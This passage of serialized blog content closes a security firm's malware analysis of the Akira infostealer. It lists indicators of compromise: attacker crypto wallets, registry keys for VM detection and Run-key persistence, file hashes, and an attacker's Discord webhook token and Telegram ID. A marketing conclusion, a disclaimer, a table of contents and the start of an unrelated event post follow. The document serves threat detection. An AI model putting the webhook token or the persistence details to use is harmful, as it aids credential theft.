Addresses",[806,18338,1536],{},[1902,18340,1905,18342],{"className":18341,"style":10692},[17110],[1923,18343,18344,1905,18352,1905,18362,1905,18372,1905,18382,1905,18391,1905,18401,1905,18411,1905,18421,1905,18431,1905,18441],{},[1911,18345,1909,18346,1909,18349,1905],{},[1915,18347,18348],{"style":17121},"Currency",[1915,18350,18351],{"style":10861},"Address",[1911,18353,1909,18354,1909,18357,1905],{},[1928,18355,18356],{},"BTC",[1928,18358,18359],{},[1524,18360,18361],{},"bc1qnmz2l8lr0yzj9eun48dyds7rlzg6t6hk5vw5zt",[1911,18363,1909,18364,1909,18367,1905],{"style":10717},[1928,18365,18366],{},"ETH",[1928,18368,18369],{},[1524,18370,18371],{},"0xa8a2C9e3fbCde807101dBD87aF7b51583f83d1D5",[1911,18373,1909,18374,1909,18377,1905],{},[1928,18375,18376],{},"DOGE",[1928,18378,18379],{},[1524,18380,18381],{},"DACeoqWDPmNARSZAeDZPFwqwecbByaksmd",[1911,18383,1909,18384,1909,18387,1905],{"style":10717},[1928,18385,18386],{},"LTC",[1928,18388,18389],{},[1524,18390,17151],{},[1911,18392,1909,18393,1909,18396,1905],{},[1928,18394,18395],{},"XMR",[1928,18397,18398],{},[1
524,18399,18400],{},"4AVdkoC16zwcjxF4q9cXdL2D4vGqC9iPAcQ9gmHzQ7JS1fUUff6Za3D6CKm9MsDrhSDRY9hgeca7yKnMGpaD8dq6Bo3mT7D",[1911,18402,1909,18403,1909,18406,1905],{"style":10717},[1928,18404,18405],{},"BCH",[1928,18407,18408],{},[1524,18409,18410],{},"qrfs8ee558t0a2dlp9v6h4qzns5cd6pltqrrn883xs",[1911,18412,1909,18413,1909,18416,1905],{},[1928,18414,18415],{},"DASH",[1928,18417,18418],{},[1524,18419,18420],{},"XpeiSH1MfQYeehTfxosYHyTHzbgu2LNsG1",[1911,18422,1909,18423,1909,18426,1905],{"style":10717},[1928,18424,18425],{},"TRX",[1928,18427,18428],{},[1524,18429,18430],{},"TFuYQoosCUqbVjibowMqaa3W3h3RtAVDbK",[1911,18432,1909,18433,1909,18436,1905],{},[1928,18434,18435],{},"XRP",[1928,18437,18438],{},[1524,18439,18440],{},"r36AwwhUH7BRujevi5mukbDrG46KGbTk8V",[1911,18442,1909,18443,1909,18446,1905],{"style":10717},[1928,18444,18445],{},"XLM",[1928,18447,18448],{},[1524,18449,18450],{},"GAEPMD52PX7FYX65AJJLEFZSH3DZSL3DKM2XRXHVJP4CLJFIBKI25C33",[1541,18452],{"className":18453},[6875,6876],[810,18455,18457],{"id":18456},"_3-registry-keys-paths","3. 
Registry Keys / Paths",[806,18459,1536],{},[1902,18461,1905,18463],{"className":18462,"style":10692},[17110],[1923,18464,18465,1905,18472,1905,18482,1905,18492,1905,18505],{},[1911,18466,1909,18467,1909,18470,1905],{},[1915,18468,7683],{"style":18469},"text-align: left; width: 60%;",[1915,18471,7225],{"style":10861},[1911,18473,1909,18474,1909,18479,1905],{},[1928,18475,18476],{},[1524,18477,18478],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc",[1928,18480,18481],{},"Checks for virtual GPU driver signature",[1911,18483,1909,18484,1909,18489,1905],{"style":10717},[1928,18485,18486],{},[1524,18487,18488],{},"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName",[1928,18490,18491],{},"Checks for virtual GPU provider name",[1911,18493,1909,18494,1909,18502,1905],{},[1928,18495,18496,18499,18500,2772],{},[1524,18497,18498],{},"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"," (value ",[1736,18501,7694],{},[1928,18503,18504],{},"Persistence via Run key (Updater.exe)",[1911,18506,1909,18507,1909,18511,1905],{"style":10717},[1928,18508,18509],{},[1524,18510,7702],{},[1928,18512,18513],{},"Persistence Executable",[1541,18515],{"className":18516},[6875,6876],[810,18518,18520],{"id":18519},"_5-files-hashes","5. 
Files & Hashes",[806,18522,1536],{},[1902,18524,1905,18526],{"className":18525,"style":10692},[17110],[1923,18527,18528,1905,18539,1905,18551,1905,18563,1905,18576,1905,18588,1905,18600,1905,18612,1905,18624,1905,18637,1905,18649,1905,18662,1905,18674],{},[1911,18529,1909,18530,1909,18532,1909,18536,1905],{},[1915,18531,17454],{"style":18042},[1915,18533,18535],{"style":18534},"text-align: left; width: 62%;","SHA256",[1915,18537,18538],{"style":10861},"Size (bytes)",[1911,18540,1909,18541,1909,18543,1909,18548,1905],{},[1928,18542,7852],{},[1928,18544,18545],{},[1524,18546,18547],{},"331A4A4D721A1B5B1BB5E9A5C13462D5CDB16248DEFE0F16BE6E1E57C275E380",[1928,18549,18550],{},"63936274",[1911,18552,1909,18553,1909,18555,1909,18560,1905],{"style":10717},[1928,18554,6639],{},[1928,18556,18557],{},[1524,18558,18559],{},"C98F0F5B89C6DAC1482286FAA2E33A84230C26EA38DA4E013665582C9A04213B",[1928,18561,18562],{},"162036224",[1911,18564,1909,18565,1909,18568,1909,18573,1905],{},[1928,18566,18567],{},"jscrypter.js",[1928,18569,18570],{},[1524,18571,18572],{},"0A47985F8B3716058B0DF6C68EC97D0F1F3CB0F7A31562A819C3E766ED4CDCEF",[1928,18574,18575],{},"1429",[1911,18577,1909,18578,1909,18580,1909,18585,1905],{"style":10717},[1928,18579,8836],{},[1928,18581,18582],{},[1524,18583,18584],{},"1E666F3CF6E3DA6EED973E00E81EC721B33B17D4E981CB506F62F349DC1B3343",[1928,18586,18587],{},"30138",[1911,18589,1909,18590,1909,18592,1909,18597,1905],{},[1928,18591,8833],{},[1928,18593,18594],{},[1524,18595,18596],{},"E375DE29E23C43627B2894EA01B6B1C7D9B1BD37E7305EEC7185CEE9719924A7",[1928,18598,18599],{},"7155",[1911,18601,1909,18602,1909,18604,1909,18609,1905],{"style":10717},[1928,18603,8766],{},[1928,18605,18606],{},[1524,18607,18608],{},"972C634FD0666BCA12A6B7A50E69C32610321E9EC4D28D65734E55437D345CC6",[1928,18610,18611],{},"211",[1911,18613,1909,18614,1909,18616,1909,18621,1905],{},[1928,18615,6643],{},[1928,18617,18618],{},[1524,18619,18620],{},"850361AF7D6C006900FC638D6ACBD9A6362385BAD0530CFBD52555E
6415DB3A4",[1928,18622,18623],{},"205210",[1911,18625,1909,18626,1909,18629,1909,18634,1905],{"style":10717},[1928,18627,18628],{},"exodus.asar",[1928,18630,18631],{},[1524,18632,18633],{},"6A3B5D5A6BA5925DF39351830D92A2B5E4720803FE9F8040C3E67C12F668F4EB",[1928,18635,18636],{},"132486332",[1911,18638,1909,18639,1909,18641,1909,18646,1905],{},[1928,18640,7911],{},[1928,18642,18643],{},[1524,18644,18645],{},"10E4A6B54CC0CF4D18DDE8B69E0B305ABE487E07ED990C5BFF82CE30B217B910",[1928,18647,18648],{},"28454",[1911,18650,1909,18651,1909,18654,1909,18659,1905],{"style":10717},[1928,18652,18653],{},"download.dat",[1928,18655,18656],{},[1524,18657,18658],{},"C49E83A5F154F7E54CA0CE9EECEA066A721966786F2850626252DDA0BE0BF79B",[1928,18660,18661],{},"21142",[1911,18663,1909,18664,1909,18666,1909,18671,1905],{},[1928,18665,8894],{},[1928,18667,18668],{},[1524,18669,18670],{},"E6F6AD49076367A58220E48691A34E33C18F0285FD9C50879A9B83A99F840AD7",[1928,18672,18673],{},"32375391",[1911,18675,1909,18676,1909,18678,1909,18683,1905],{"style":10717},[1928,18677,6635],{},[1928,18679,18680],{},[1524,18681,18682],{},"36C34E39DC7D54C4C97DDEB9B6C7FD429DB26C34D65CCE8BE3523FDFDB7CEBE0",[1928,18684,18685],{},"37652937",[1541,18687],{"className":18688},[6875,6876],[810,18690,18692],{"id":18691},"_5-discord-telegram-identifier","5. 
Discord & Telegram Identifier",[806,18694,1536],{},[1902,18696,1905,18698],{"className":18697,"style":10692},[17110],[1923,18699,18700,1905,18706,1905,18716,1905,18726],{},[1911,18701,1909,18702,1909,18704,1905],{},[1915,18703,18043],{"style":12313},[1915,18705,7442],{"style":10861},[1911,18707,1909,18708,1909,18711,1905],{},[1928,18709,18710],{},"Discord Webhook ID",[1928,18712,18713],{},[1524,18714,18715],{},"1226766972675428372",[1911,18717,1909,18718,1909,18721,1905],{"style":10717},[1928,18719,18720],{},"Discord Webhook Token",[1928,18722,18723],{},[1524,18724,18725],{},"BuBywdldEWncg7fbIpEhCROLpkGLkYirOoP2bP-uzzOatDaxSpaWqaLNerun85qCfwNz",[1911,18727,1909,18728,1909,18731,1905],{},[1928,18729,18730],{},"Telegram ID",[1928,18732,18733],{},[1524,18734,18735],{},"5035121855",[1541,18737],{"className":18738},[6875,6876],[1511,18740,18742],{"id":18741},"_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","14. Reflecting on the Akira Stealer Incident: Strengthening Your Defense with glueckkanja CSOC",[806,18744,816],{},[806,18746,18747],{},"Throughout this blog, we've explored the sophisticated nature of the Akira Infostealer—an advanced cyber threat characterized by targeted credential theft, stealthy data exfiltration, and persistent methods to evade traditional defenses. Understanding how this malware functions, the risks it poses, and the vulnerabilities it exploits is crucial in building a robust cybersecurity strategy.",[806,18749,18750],{},"The Akira Infostealer specifically targets sensitive data such as login credentials, browser sessions, cryptocurrency wallets, messaging services, and personal or organizational files. 
Its calculated and precise methods demand more than just standard security measures—they require continuous monitoring, in-depth forensic analysis, and proactive threat intelligence.",[806,18752,18753],{},"At glueckkanja CSOC, we leverage our deep technical expertise and advanced analytical capabilities to go beyond simple detection. Our specialized team continually monitors threats in real-time from our dedicated CSOC servers, enabling immediate identification, thorough investigation, and effective neutralization of threats like the Akira Infostealer.",[806,18755,18756],{},"But our work doesn’t stop at incident response. Every detected incident enriches our knowledge base, enhancing our security posture and ensuring we remain several steps ahead of future threats. With glueckkanja CSOC, you gain more than protection—you gain an adaptive security partner committed to your long-term resilience.",[806,18758,18759],{},"Take the next step in securing your organization's digital assets.",[806,18761,18762],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[806,18764,18765],{},[1736,18766,18767],{},"Empower your defense with glueckkanja CSOC.",[1511,18769,18771],{"id":18770},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[806,18773,816],{},[806,18775,18776],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. 
We publish this in good faith and with the intent to contribute to the broader security community.",[806,18778,18779],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or operational use of any such code is explicitly discouraged. Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[806,18781,18782],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[806,18784,18785],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[806,18787,18788],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. 
When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[806,18790,18791],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[3604,18793,18794],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki 
.s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":863,"searchDepth":864,"depth":864,"links":18796},[18797,18798,18799,18800,18811,18812,18813,18814,18815,18816,18817,18818,18820,18821,18822,18823,18824,18825,18826,18827,18828,18831,18839,18840,18841,18847,18865,18883,18884,18885,18886,18894,18901,18908,18917,18924,18925,18926,18927,18928,18929,18930,18931,18932,18933,18934,18935,18936,18937,18938,18939],{"id":6766,"depth":864,"text":6767},{"id":6814,"depth":864,"text":6815},{"id":6834,"depth":864,"text":6835},{"id":6888,"depth":864,"text":6889,"children":18801},[18802,18803,18805,18807,18809],{"id":6908,"depth":1814,"text":6909},{"id":6960,"depth":1814,"text":18804},"2.1.2 Updater.exe – Initial Loader",{"id":7065,"depth":1814,"text":18806},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":7183,"depth":1814,"text":18808},"2.1.4 cmd.exe & PowerShell Relay",{"id":7293,"depth":1814,"text":18810},"2.1.5 python.exe with astor.py",{"id":7427,"depth":864,"text":7428},{"id":7510,"depth":864,"text":7511},{"id":7588,"depth":864,"text":7589},{"id":7667,"depth":864,"text":7668},{"id":7734,"depth":864,"text":7735},{"id":7814,"depth":864,"text":7815},{"id":7923,"depth":864,"text":7924},{"id":8040,"depth":864,"text":18819},"4.2 AMSI Bypass Technique (Class: 
gofor4msi)",{"id":8224,"depth":864,"text":8225},{"id":8345,"depth":864,"text":8346},{"id":8443,"depth":864,"text":8444},{"id":8539,"depth":864,"text":8540},{"id":8614,"depth":864,"text":8615},{"id":8685,"depth":864,"text":8686},{"id":8745,"depth":864,"text":8746},{"id":8880,"depth":864,"text":8881},{"id":8941,"depth":864,"text":8942,"children":18829},[18830],{"id":8953,"depth":1814,"text":8954},{"id":9302,"depth":864,"text":9303,"children":18832},[18833,18834,18835,18836,18837,18838],{"id":9311,"depth":1814,"text":9312},{"id":9425,"depth":1814,"text":9426},{"id":9622,"depth":1814,"text":9623},{"id":9910,"depth":1814,"text":9911},{"id":9986,"depth":1814,"text":9987},{"id":10146,"depth":1814,"text":10147},{"id":10381,"depth":864,"text":10382},{"id":10427,"depth":864,"text":10428},{"id":10439,"depth":864,"text":10440,"children":18842},[18843,18844,18845,18846],{"id":10445,"depth":1814,"text":10446},{"id":10489,"depth":1814,"text":10490},{"id":10551,"depth":1814,"text":10552},{"id":10586,"depth":1814,"text":10587},{"id":10622,"depth":864,"text":18848,"children":18849},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[18850,18851,18852,18853,18855,18856,18857,18858,18859,18860,18861,18862,18863,18864],{"id":10631,"depth":1814,"text":10632},{"id":10646,"depth":1814,"text":10647},{"id":10686,"depth":1814,"text":10687},{"id":10776,"depth":1814,"text":18854},"7.3.4 VmProtect Architecture",{"id":11129,"depth":1814,"text":11130},{"id":11195,"depth":1814,"text":11196},{"id":11264,"depth":1814,"text":11265},{"id":11328,"depth":1814,"text":11329},{"id":11396,"depth":1814,"text":11397},{"id":11453,"depth":1814,"text":11454},{"id":11551,"depth":1814,"text":11552},{"id":11621,"depth":1814,"text":11622},{"id":12077,"depth":1814,"text":12078},{"id":12124,"depth":1814,"text":12125},{"id":12138,"depth":864,"text":12139,"children":18866},[18867,18868,18870,18872,18874,18876,18878,18880,18882],{"id":12297,"depth":1814,"text":12298},{"id":12405,"depth":1814,"text":18869},"7.4.2 Password 
Dumper (Chromium.GetPasswords)",{"id":12527,"depth":1814,"text":18871},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":12609,"depth":1814,"text":18873},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":12689,"depth":1814,"text":18875},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":12816,"depth":1814,"text":18877},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":12886,"depth":1814,"text":18879},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":12949,"depth":1814,"text":18881},"7.4.8 Firefox Profile Grabber (GeckoDriver & grabFirefoxProfiles)",{"id":13027,"depth":1814,"text":13028},{"id":13066,"depth":864,"text":13067},{"id":13398,"depth":864,"text":13399},{"id":13512,"depth":864,"text":13513},{"id":13840,"depth":864,"text":13841,"children":18887},[18888,18889,18890,18891,18892,18893],{"id":13849,"depth":1814,"text":13850},{"id":14000,"depth":1814,"text":14001},{"id":14106,"depth":1814,"text":14107},{"id":14231,"depth":1814,"text":14232},{"id":14298,"depth":1814,"text":14299},{"id":14423,"depth":1814,"text":14424},{"id":14528,"depth":864,"text":18895,"children":18896},"7.9. 
Discord and Telegram Token Theft (Class: Discord)",[18897,18898,18899,18900],{"id":14542,"depth":1814,"text":14543},{"id":14673,"depth":1814,"text":14674},{"id":14916,"depth":1814,"text":14917},{"id":14997,"depth":1814,"text":14998},{"id":15067,"depth":864,"text":15068,"children":18902},[18903,18905,18906,18907],{"id":15080,"depth":1814,"text":18904},"7.10.1 Data Class Initialization",{"id":15178,"depth":1814,"text":15179},{"id":15298,"depth":1814,"text":15299},{"id":15363,"depth":1814,"text":15364},{"id":15440,"depth":864,"text":18909,"children":18910},"7.11 File Grabber (Class: Utils.steal_files)",[18911,18912,18913,18914,18915,18916],{"id":15452,"depth":1814,"text":15453},{"id":15523,"depth":1814,"text":15524},{"id":15585,"depth":1814,"text":15586},{"id":15618,"depth":1814,"text":15619},{"id":15647,"depth":1814,"text":15648},{"id":15826,"depth":1814,"text":15827},{"id":15934,"depth":864,"text":15935,"children":18918},[18919,18920,18921,18922,18923],{"id":15943,"depth":1814,"text":15944},{"id":15958,"depth":1814,"text":15959},{"id":16037,"depth":1814,"text":16038},{"id":16186,"depth":1814,"text":16187},{"id":16419,"depth":1814,"text":16420},{"id":16770,"depth":864,"text":16771},{"id":16801,"depth":864,"text":16802},{"id":16925,"depth":864,"text":16926},{"id":17036,"depth":864,"text":17037},{"id":17087,"depth":864,"text":17088},{"id":17264,"depth":864,"text":17265},{"id":17314,"depth":864,"text":17315},{"id":17358,"depth":864,"text":17359},{"id":17398,"depth":864,"text":17399},{"id":17489,"depth":864,"text":17490},{"id":17506,"depth":864,"text":17507},{"id":18029,"depth":864,"text":18030},{"id":18335,"depth":864,"text":18336},{"id":18456,"depth":864,"text":18457},{"id":18519,"depth":864,"text":18520},{"id":18691,"depth":864,"text":18692},{"lang":953,"seoTitle":18941,"titleClass":873,"date":18942,"categories":18943,"blogtitlepic":18944,"socialimg":18945,"customExcerpt":18946,"keywords":18947,"maxContent":508,"asideNav":18948,"footer":18997,"contactInContent":18998,"
published":508,"hreflang":19032},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[371],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat Protection",{"menuItems":18949},[18950,18952,18955,18958,18961,18964,18967,18970,18973,18976,18979,18982,18985,18988,18991,18994],{"href":18951,"text":6597},"#prologue",{"href":18953,"text":18954},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":18956,"text":18957},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":18959,"text":18960},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":18962,"text":18963},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":18965,"text":18966},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":18968,"text":18969},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":18971,"text":18972},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":18974,"text":18975},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":18977,"text":18978},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":18980,"text":18981},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira 
Ecosystem",{"href":18983,"text":18984},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":18986,"text":18987},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":18989,"text":18990},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":18992,"text":18993},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":18995,"text":18996},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":508},{"quote":749,"infos":18999},{"bgColor":19000,"color":884,"boxBgColor":19001,"boxColor":19002,"headline":19003,"subline":19004,"level":810,"textStyling":887,"flush":888,"person":19005,"form":19012},"var(--color-gk-violet)","var(--color-gk-yellow)","var(--color-copy)","Get in touch now","As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. 
Let's talk and strengthen your cyber defenses together!",{"image":19006,"cloudinary":508,"alt":19007,"name":19007,"detailsHeader":19008,"details":19009},"/people/people-pam-team.png","Project & Account Management","We look forward to hearing from you!",[19010,19011],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":19013,"cta":19014,"method":870,"action":908,"fields":19015},"Send",{"skin":907},[19016,19017,19019,19022,19025,19028,19030,19031],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19018},"Please enter your name.",{"label":19020,"type":916,"id":612,"required":508,"requiredMsg":19021},"Company*","Please enter your company.",{"label":19023,"type":924,"id":924,"required":508,"requiredMsg":19024},"Email address*","Please enter your email address.",{"label":19026,"type":933,"id":934,"required":508,"requiredMsg":19027},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","Please confirm",{"type":911,"id":942,"value":19029},"Form: Blog MSSP 2025 | EN",{"type":911,"id":945,"value":946},{"type":911,"id":948},[19033,19035],{"lang":953,"href":19034},"/en/posts/2025-06-16-quiet-breach",{"lang":956,"href":19036},"/es/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":6590,"description":816},"posts/2025-06-16-quiet-breach",[19041,3709,3713,19042],"Microsoft 365 Defender","Incident Deep Dive","dg8ndC-OFDBkSSEfhAd2U7FsvjkUT6y5G-ckVtDqMcY",{"id":19045,"title":19046,"author":19047,"body":19048,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19233,"moment":19235,"navigation":508,"path":19282,"seo":19283,"stem":19284,"tags":19285,"webcast":749,"__hash__":19288},"content_de/posts/2025-05-25-tech-conference-2025.md","Wien. Microsoft. Wir. 
– Auf der techConference 2025.",[801],{"type":803,"value":19049,"toc":19228},[19050,19054,19056,19059,19068,19077,19081,19083,19090,19093,19096,19099,19133,19138,19180,19183,19187,19189,19196,19199,19222,19225],[810,19051,19053],{"id":19052},"warum-techconference","Warum techConference?",[806,19055,816],{},[806,19057,19058],{},"Am 3. und 4. Juni 2025 wird Wien zum Hotspot für Tech-Innovation – und wir sind mittendrin. Als Platinum Partner der techConference 2025 zeigen wir nicht nur Präsenz, sondern setzen ein klares Zeichen: für Resilienz, für Cloud-Infrastruktur made in Austria und für eine Partnerschaft mit Microsoft, die mehr kann als Buzzwords.",[806,19060,19061,19062,19067],{},"Im Zentrum unseres Auftritts: ",[833,19063,19066],{"href":19064,"rel":19065},"https://www.glueckkanja.com/de/azure/azure-emergency-response-environment",[1410],"Azure Emergency Response Environment (AzERE)"," – unsere Plattform für Azure Emergency Response Environments. Sie ermöglicht Unternehmen, im Ernstfall blitzschnell wieder handlungsfähig zu sein. Ob Ransomware, Systemausfall oder Kommunikationsbruch: AzERE bringt kritische Prozesse und Identitäten in kürzester Zeit zurück in den Betrieb. In unserer Keynote zeigen wir das live – gemeinsam mit Christoph Schacher, CISO von Wienerberger, der aus erster Hand berichtet, wie AzERE zum Game-Changer in seiner Sicherheitsstrategie wurde.",[806,19069,19070,19071,19076],{},"Gleichzeitig fällt auf der techConference auch der Startschuss für eine neue Ära: ",[833,19072,19075],{"href":19073,"rel":19074},"https://www.glueckkanja.com/de/azure/azure-goes-austria",[1410],"der Launch der Microsoft Cloudregion Österreich",". Wir freuen uns, offizieller Launchpartner zu sein – und unterstützen Unternehmen dabei, diese Infrastruktur ab dem ersten Tag effizient und sicher zu nutzen. 
Das bedeutet: Datenhaltung in Österreich, Compliance-by-Design, noch schnellere Performance – und ein starkes Signal für digitale Souveränität im Land.",[810,19078,19080],{"id":19079},"wenn-alles-ausfällt-zählt-nur-eins-geschwindigkeit","Wenn alles ausfällt, zählt nur eins: Geschwindigkeit.",[806,19082,816],{},[806,19084,19085,19086,19089],{},"Am ",[1736,19087,19088],{},"4. Juni (Tag 2) um 9 Uhr im Raum Terminator"," zeigen wir in unserer Keynote auf der techConference, wie Unternehmen in der Krise handlungsfähig bleiben. Nicht theoretisch – sondern mit System.",[806,19091,19092],{},"AzERE ist unsere Antwort auf den Worst Case: Eine Plattform, mit der kritische Prozesse und Kommunikation nach einem Angriff in Minuten wieder anlaufen. Kein Reboot, kein Rätselraten – sondern ein klarer Plan für den Ernstfall.",[806,19094,19095],{},"Auf der Bühne: Jan Geisbauer und Florian Stöckl, die zeigen, wie AzERE funktioniert. Und Christoph Schacher, CISO von Wienerberger, der erklärt, warum sein Unternehmen genau darauf setzt – und wie daraus ein strategischer Vorteil wurde.",[3604,19097,19098],{},"\n    body {\n      margin: 0;\n      background-color: #f9f9f9;\n    }\n\n    .gallery-container {\n      display: grid;\n      grid-template-columns: repeat(3, 1fr);\n      gap: 20px;\n      padding: 10px;\n      max-width: 600px;\n    }\n\n    .gallery-container img {\n      width: 100%;\n      height: 100%;\n      object-fit: cover;\n    }\n\n    .gallery-item {\n      display: flex;\n      flex-direction: column;\n    }\n\n    .caption {\n      margin-top: 10px;\n      font-size: 16px;\n      text-align: center;\n    }\n  
",[1541,19100,1909,19103,1909,19115,1909,19124,1905],{"className":19101},[19102],"gallery-container",[1541,19104,1913,19107,1913,19110,1909],{"className":19105},[19106],"gallery-item",[1449,19108],{"src":19109,"alt":1180},"https://res.cloudinary.com/c4a8/image/upload/events/christoph-schacher.jpg",[1541,19111,19114],{"className":19112},[19113],"caption","Christoph Schacher",[1541,19116,1913,19118,1913,19121,1909],{"className":19117},[19106],[1449,19119],{"src":19120,"alt":1226},"https://res.cloudinary.com/c4a8/image/upload/events/Florian.Stoeckl.648.jpg",[1541,19122,1226],{"className":19123},[19113],[1541,19125,1913,19127,1913,19130,1909],{"className":19126},[19106],[1449,19128],{"src":19129,"alt":1127},"https://res.cloudinary.com/c4a8/image/upload/events/Jan.Geisbauer.648.png",[1541,19131,1127],{"className":19132},[19113],[1541,19134],{"className":19135},[19136,19137],"container","space-bottom-2",[1541,19139,1909,19140,1905],{},[833,19141,19148,1913,19151],{"role":3858,"className":19142,"dataText":19146,"href":19147,"target":513},[3860,3861,19143,19144,3862,19145,3863],"w-100","w-lg-auto","cta--external","Zum Programm","https://techconference.at/agenda",[1588,19149,19146],{"className":19150},[3872],[1588,19152,19158],{"className":19153,"style":19157},[19154,19155,19156,3863],"icon","icon--right","icon--arrow-external","--color-icon: currentColor; --icon-rotation: 0deg;",[19159,19160,19169,19170,19169,19176,19179],"svg",{"viewBox":19161,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},"0 0 34 34","28px","6","preserve","1.1","http://www.w3.org/2000/svg","http://www.w3.org/1999/xlink","stroke: currentcolor; transform: rotate(var(--icon-rotation)) scale(var(--icon-scale));","\n          ",[19171,19172],"path",{"d":19173,"transform":19174,"style":19175},"M33.23,2.39,1.79,33.79","translate(-0.79 -0.79)","fill: none; stroke-linecap: round; stroke-linejoin: round; stroke-width: 
